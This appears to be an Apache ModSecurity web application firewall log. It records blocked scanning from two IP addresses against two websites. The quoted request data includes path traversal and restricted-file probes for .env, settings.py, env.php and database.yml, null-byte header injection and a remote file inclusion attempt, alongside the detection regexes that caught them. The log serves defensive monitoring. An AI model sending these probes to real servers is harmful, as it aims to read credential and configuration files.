[Tue May 12 05:30:16.425523 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKeyAgpmE1yW0glLdguUwAAAM4"]
[Tue May 12 05:30:17.057382 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.247:63036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKexAgpmE1yW0glLdguRQAAANQ"]
[Tue May 12 05:30:17.799747 2026] [security2:error] [pid 1820198:tid 1820203] [client 98.84.60.17:31595] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://50.7.112.35 found within ARGS:url: http://50.7.112.35/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKeyc1tk6y7yBJLpJo5zgAAAIM"]
[Tue May 12 05:30:17.800220 2026] [security2:error] [pid 1820198:tid 1820203] [client 98.84.60.17:31595] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKeyc1tk6y7yBJLpJo5zgAAAIM"]
[Tue May 12 05:30:17.867979 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeydr1yOh9TvizeziftgAAAEY"]
[Tue May 12 05:30:17.868039 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeydr1yOh9TvizeziftgAAAEY"]
[Tue May 12 05:30:17.868070 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeydr1yOh9TvizeziftgAAAEY"]
[Tue May 12 05:30:17.868275 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeydr1yOh9TvizeziftgAAAEY"]
[Tue May 12 05:30:17.868326 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeydr1yOh9TvizeziftgAAAEY"]
[Tue May 12 05:30:17.868361 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeydr1yOh9TvizeziftgAAAEY"]
[Tue May 12 05:30:17.868767 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKeydr1yOh9TvizeziftgAAAEY"]
[Tue May 12 05:30:17.909043 2026] [security2:error] [pid 1820198:tid 1820203] [client 98.84.60.17:31595] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKeyc1tk6y7yBJLpJo5zgAAAIM"]
[Tue May 12 05:30:17.997624 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.247:29796] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKexggpmE1yW0glLdguUAAAANY"]
[Tue May 12 05:30:18.005102 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.247:62962] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKewdr1yOh9TvizezifpAAAAFA"]
[Tue May 12 05:30:18.030237 2026] [security2:error] [pid 1825287:tid 1825324] [client 45.148.10.247:63002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKewQgpmE1yW0glLdguPwAAANM"]
[Tue May 12 05:30:18.122535 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.247:63024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKewRfeipD4uoG21FowygAAAAg"]
[Tue May 12 05:30:18.651472 2026] [security2:error] [pid 1844863:tid 1844882] [client 45.148.10.247:63028] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKew_aAnTZtx1_H_wy3dwAAAU0"]
[Tue May 12 05:30:18.729811 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.247:63058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKexRfeipD4uoG21Fow0AAAAA0"]
[Tue May 12 05:30:19.289312 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeyAgpmE1yW0glLdguUwAAAM4"]
[Tue May 12 05:30:19.332373 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKeywgpmE1yW0glLdguWAAAAM4"]
[Tue May 12 05:30:19.332586 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKeywgpmE1yW0glLdguWAAAAM4"]
[Tue May 12 05:30:19.449328 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/app/.env"] [unique_id "agKey81tk6y7yBJLpJo50QAAAIY"]
[Tue May 12 05:30:19.449524 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/.env"] [unique_id "agKey81tk6y7yBJLpJo50QAAAIY"]
[Tue May 12 05:30:19.710588 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.247:29832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeyPaAnTZtx1_H_wy3gwAAAVc"]
[Tue May 12 05:30:19.718522 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeydr1yOh9TvizeziftgAAAEY"]
[Tue May 12 05:30:19.754776 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKey9r1yOh9TvizezifuwAAAEY"]
[Tue May 12 05:30:19.754826 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKey9r1yOh9TvizezifuwAAAEY"]
[Tue May 12 05:30:19.754854 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKey9r1yOh9TvizezifuwAAAEY"]
[Tue May 12 05:30:19.755073 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKey9r1yOh9TvizezifuwAAAEY"]
[Tue May 12 05:30:19.755134 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKey9r1yOh9TvizezifuwAAAEY"]
[Tue May 12 05:30:19.755164 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKey9r1yOh9TvizezifuwAAAEY"]
[Tue May 12 05:30:19.755572 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKey9r1yOh9TvizezifuwAAAEY"]
[Tue May 12 05:30:20.783575 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeywgpmE1yW0glLdguWAAAAM4"]
[Tue May 12 05:30:20.820178 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKey81tk6y7yBJLpJo50QAAAIY"]
[Tue May 12 05:30:20.826860 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKezAgpmE1yW0glLdguXgAAAM4"]
[Tue May 12 05:30:20.827153 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKezAgpmE1yW0glLdguXgAAAM4"]
[Tue May 12 05:30:20.852920 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:29880] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKezM1tk6y7yBJLpJo51wAAAI0"]
